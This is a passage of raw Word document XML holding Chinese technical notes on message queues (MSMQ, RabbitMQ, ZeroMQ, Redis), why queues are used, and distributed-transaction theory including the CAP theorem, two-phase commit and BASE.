        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="33"/>
          <w:rFonts w:hint="eastAsia" w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:eastAsiaTheme="minorEastAsia"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="zh-CN"/>
        </w:rPr>
        <w:t>头和消息体。</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插件开发</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="154"/>
        </w:numPr>
        <w:ind w:left="450"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
          <w:color w:val="333333"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Mvc Area插件开发</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="154"/>
        </w:numPr>
        <w:ind w:left="450"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
          <w:color w:val="333333"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>OSGi.NET</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="154"/>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消息队列</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="155"/>
        </w:numPr>
        <w:ind w:left="450"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
          <w:color w:val="333333"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>消息队列 - Message Queue(MQ)，是一种应用程序之间的通信机制，将部分无需立即回调获取结果，并且耗时的操作，使用异步处理的方式提高服务器的吞吐量及性能.如秒杀活动，上传任务，日志记录等</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="155"/>
        </w:numPr>
        <w:ind w:left="450"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
          <w:color w:val="333333"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="155"/>
        </w:numPr>
        <w:ind w:left="450"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
          <w:color w:val="333333"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>MSMQ</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="156"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1440"/>
        </w:tabs>
        <w:ind w:left="900"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
          <w:color w:val="333333"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>微软官方推出的消息队列框架</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="155"/>
        </w:numPr>
        <w:ind w:left="450"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
          <w:color w:val="333333"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>RibbitMq</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="157"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1440"/>
        </w:tabs>
        <w:ind w:left="900"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
          <w:color w:val="333333"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>基于 AMQP 系统协议，由 Erlang 语言开发，开源的消息队列,支持AMQP，XMPP, SMTP, STOMP等协议，使用简单</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="155"/>
        </w:numPr>
        <w:ind w:left="450"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
          <w:color w:val="333333"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>ZeroMQ</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="158"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1440"/>
        </w:tabs>
        <w:ind w:left="900"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
          <w:color w:val="333333"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>一个轻量级的消息通信组件,侧重于点对点的消息传输上</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="155"/>
        </w:numPr>
        <w:ind w:left="450"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
          <w:color w:val="333333"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Redis</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="159"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1440"/>
        </w:tabs>
        <w:ind w:left="900"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
          <w:color w:val="333333"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>虽是一个Key-Value的NoSQL数据库,但本身也有Queue队列功能</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="155"/>
        </w:numPr>
        <w:ind w:left="450"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
          <w:color w:val="333333"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>...</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
        <w:tabs>
          <w:tab w:val="left" w:pos="720"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
          <w:color w:val="333333"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="43"/>
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>什么是消息队列？</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="37"/>
        <w:rPr>
          <w:kern w:val="0"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:kern w:val="0"/>
        </w:rPr>
        <w:t>消息（Message）是指在应用间传送的数据。消息可以非常简单，比如只包含文本字符串，也可以更复杂，可能包含嵌入对象。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="37"/>
        <w:rPr>
          <w:kern w:val="0"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:kern w:val="0"/>
        </w:rPr>
        <w:t>消息队列（Message Queue）是一种应用间的通信方式，消息发送后可以立即返回，由消息系统来确保消息的可靠传递。消息发布者只管把消息发布到 MQ 中而不用管谁来取，消息使用者只管从 MQ 中取消息而不管是谁发布的。这样发布者和使用者都不用知道对方的存在。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="37"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="43"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>为何用消息队列？</w:t>
      </w:r>
      <w:r>
        <w:t> </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="37"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="37"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>1.  加快网站的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
        </w:rPr>
        <w:t>响</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>应速度</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="37"/>
      </w:pPr>
      <w:r>
        <w:t>　   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订单号”才能进入到订单详情页，这种处理也是因为消息队列的非及时性，所以需要得到网站设计方改进和支持。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="37"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="37"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>2. 提供系统的可用性</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="37"/>
      </w:pPr>
      <w:r>
        <w:t>    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email或者短信延迟收到，不会对系统造成太大的影响。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="37"/>
      </w:pPr>
      <w:r>
        <w:t> </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="37"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>3. 并发削峰</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="37"/>
      </w:pPr>
      <w:r>
        <w:t>   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w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>在代码层面上我们可以用lock机制来串行化，在分布式中我们用“消息队列”来</w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve"> HYPERLINK \l "串行化" </w:instrText>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>串行化</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r>
        <w:t>，而且还可以通过逻辑操作来对消息队列进行动态的防洪，控洪。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="37"/>
      </w:pPr>
      <w:r>
        <w:t> </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="37"/>
      </w:pPr>
      <w:r>
        <w:t>在消息队列的选择上，微软有自己的MSMQ，但是在大型网站中，我们的消息队列同样需要集群，并且希望能跑在内存中，并且支持序列化硬盘，同时在“伸缩性”和“可靠性”上要有好的作为，所以推荐大家用用开源的RabbitMQ，网址：</w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve"> HYPERLINK "http://www.rabbitmq.com/" \t "_blank" \o "http://www.rabbitmq.com/" </w:instrText>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="21"/>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana"/>
          <w:color w:val="008000"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t>http://www.rabbitmq.com/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="21"/>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana"/>
          <w:color w:val="008000"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r>
        <w:t>  不过很多公司都有自己开发的消息队列，比如携程的CMessage，淘宝的MetaQ。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="13"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="125" w:beforeAutospacing="0" w:after="125" w:afterAutospacing="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana"/>
          <w:color w:val="000000"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="13"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="125" w:beforeAutospacing="0" w:after="125" w:afterAutospacing="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana"/>
          <w:color w:val="000000"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="13"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="125" w:beforeAutospacing="0" w:after="125" w:afterAutospacing="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana"/>
          <w:color w:val="000000"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="13"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="125" w:beforeAutospacing="0" w:after="125" w:afterAutospacing="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana"/>
          <w:color w:val="000000"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="13"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="125" w:beforeAutospacing="0" w:after="125" w:afterAutospacing="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana"/>
          <w:color w:val="000000"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="13"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="125" w:beforeAutospacing="0" w:after="125" w:afterAutospacing="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana"/>
          <w:color w:val="000000"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="13"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="125" w:beforeAutospacing="0" w:after="125" w:afterAutospacing="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana"/>
          <w:color w:val="000000"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="37"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="43"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>消息队列应用之分布式事务</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="46"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>分布式理论</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="37"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="37"/>
      </w:pPr>
      <w:r>
        <w:t>当我们的单个数据库的性能产生瓶颈的时候，我们可能会对数据库进行分区，这里所说的分区指的是物理分区，分区之后可能不同的库就处于不同的服务器上了，这个时候单个数据库的ACID已经不能适应这种情况了，而在这种ACID的集群环境下，再想保证集群的ACID几乎是很难达到，或者即使能达到那么效率和性能会大幅下降，最为关键的是再很难扩展新的分区了，这个时候如果再追求集群的ACID会导致我们的系统变得很差，这时我们就需要引入一个新的理论原则来适应这种集群的情况，就是 CAP 原则或者叫CAP定理，那么CAP定理指的是什么呢？</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="37"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="46"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>CAP定理</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="37"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="37"/>
      </w:pPr>
      <w:r>
        <w:t>CAP定理是由加州大学伯克利分校Eric Brewer教授提出来的，他指出WEB服务无法同时满足一下3个属性：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="37"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="160"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>一致性</w:t>
      </w:r>
      <w:r>
        <w:t>(Consistency) ： 客户端知道一系列的操作都会同时发生(生效)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="37"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="160"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>可用性</w:t>
      </w:r>
      <w:r>
        <w:t>(Availability) ： 每个操作都必须以可预期的响应结束</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="37"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="160"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>分区容错性</w:t>
      </w:r>
      <w:r>
        <w:t>(Partition tolerance) ： 即使出现单个组件无法可用,操作依然可以完成</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="37"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="37"/>
        <w:rPr>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>具体地讲在分布式系统中，在任何数据库设计中，一个Web应用至多只能同时支持上面的两个属性。显然，任何横向扩展策略都要依赖于数据分区。因此，设计人员必须在一致性与可用性之间做出选择。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="37"/>
        <w:rPr>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="19"/>
          <w:b w:val="0"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>这个定理在迄今为止的分布式系统中都是适用的！</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t> 为什么这么说呢？</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="37"/>
        <w:rPr>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>这个时候有同学可能会把数据库的2PC（两阶段提交）搬出来说话了。OK，我们就来看一下数据库的两阶段提交。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="37"/>
        <w:rPr>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>对数据库分布式事务有了解的同学一定知道数据库支持的2PC，又叫做 XA Transactions。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="37"/>
        <w:rPr>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>MySQL从5.5版本开始支持，SQL Server 2005 开始支持，Oracle 7 开始支持。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="37"/>
        <w:rPr>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>其中，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>XA 是一个两阶段提交协议</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>，该协议分为以下两个阶段：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="37"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="161"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>第一阶段：事务协调器要求每个涉及到事务的数据库预提交(precommit)此操作，并反映是否可以提交.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="37"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="161"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>第二阶段：事务协调器要求每个数据库提交数据。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="37"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="37"/>
      </w:pPr>
      <w:r>
        <w:t>其中，如果有任何一个数据库否决此次提交，那么所有数据库都会被要求回滚它们在此事务中的那部分信息。这样做的缺陷是什么呢? 咋看之下我们可以在数据库分区之间获得一致性。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="37"/>
      </w:pPr>
      <w:r>
        <w:t>如果CAP 定理是对的，那么它一定会影响到可用性。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="37"/>
      </w:pPr>
      <w:r>
        <w:t>如果说系统的可用性代表的是执行某项操作相关所有组件的可用性的和。那么在两阶段提交的过程中，可用性就代表了涉及到的每一个数据库中可用性的和。我们假设两阶段提交的过程中每一个数据库都具有99.9%的可用性，那么如果两阶段提交涉及到两个数据库，这个结果就是99.8%。根据系统可用性计算公式，假设每个月43200分钟，99.9%的可用性就是43157分钟, 99.8%的可用性就是43114分钟，相当于每个月的宕机时间增加了43分钟。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="37"/>
      </w:pPr>
      <w:r>
        <w:t>以上，可以验证出来，CAP定理从理论上来讲是正确的，CAP我们先看到这里，等会再接着说。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="13"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="115" w:beforeAutospacing="0" w:after="115" w:afterAutospacing="0"/>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
          <w:color w:val="000000"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="46"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>BASE理论</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="37"/>
        <w:rPr>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>在分布式系统中，我们往往追求的是可用性，它的重要程序比一致性要高，那么如何实现高可用性呢？ 前人已经给我们提出来了另外一个理论，就是BASE理论，它是用来对CAP定理进行进一步扩充的。BASE理论指的是：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="37"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="162"/>
        </w:numPr>
        <w:rPr>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>Basically Available（基本可用）</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="37"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="162"/>
        </w:numPr>
        <w:rPr>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>Soft state（软状态）</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="37"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="162"/>
        </w:numPr>
        <w:rPr>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>Eventually consistent（最终一致性）</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="37"/>
        <w:rPr>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>BASE理论是对CAP中的一致性和可用性进行一个权衡的结果，理论的核心思想就是：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="19"/>
          <w:b w:val="0"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>我们无法做到强一致，但</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="19"/>
          <w:szCs w:val="16"/>
        </w:rPr>
